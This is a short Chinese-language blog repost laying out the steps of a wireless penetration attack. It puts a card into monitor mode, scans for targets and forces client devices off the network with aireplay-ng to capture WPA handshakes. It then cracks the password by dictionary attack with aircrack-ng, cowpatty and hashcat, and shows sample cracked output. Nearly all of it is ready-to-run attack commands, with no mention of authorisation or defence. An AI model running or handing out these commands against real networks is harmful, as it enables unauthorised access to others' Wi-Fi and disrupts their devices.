其他分享
首页 > 其他分享> > 2021-07-31

2021-07-31

作者:互联网

进行无线渗透的步骤包括一下几点:

1.查看可用的无线网卡

airmon-ng或者

 ifconfig -a

2.在kali下启动无线网卡的监听模式

airmon-ng start wlan1

3.扫描附近的无线网络

airodump-ng wlan1mon 4.使用参数过滤扫描列表,确定扫描目标
airodump-ng -w <扫描结果保存文件名> -c <无线信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

5.使用 aireplay-ng 迫使目标设备重连(用于获取握手信息)

aireplay-ng -<攻击模式(0)>  <攻击次数(10)> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称(wlan1mon)>

6.暴力破解 Wi-Fi 密码

6.1 用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>
6.2 用cowpatty破解
第一步:genpmk -f <密码字典,如:dict.txt> -d <存储PMK文件,如:PMK3> -s <wifi名称,如:"TP-LINK_999" >
第二步:cowpatty -d PMK3 -s "TP-LINK_999" -r <存有握手信息的cap文件,如:TP-LINK_999-01.cap>
6.3 用hashcat进行快速破解
hashcat -m 22000 30643_1625972910.hc22000  --force  dict.txt
这一步比较麻烦需要将.cap文件通过地址:https://hashcat.net/cap2hashcat/进行上传转换成.hc22000文件,同时要注意6.0.0以后版本只支持这种方式的文件

7.漫长的等待与惊喜...

# hashcat --show -m 22000 20855_1625937129.hc22000
64285937b56c4a29ff0807be9045f404:40313cec2d22:e0ccf871c104:TP-LINK_999:T***ng666

原文出自:http://pyspiderking.cn/index.php/2021/07/11/wifiscan-pwddict/

标签:07,--,31,hashcat,hc22000,ng,网卡,2021,无线
来源: https://blog.csdn.net/qq_31042199/article/details/119279643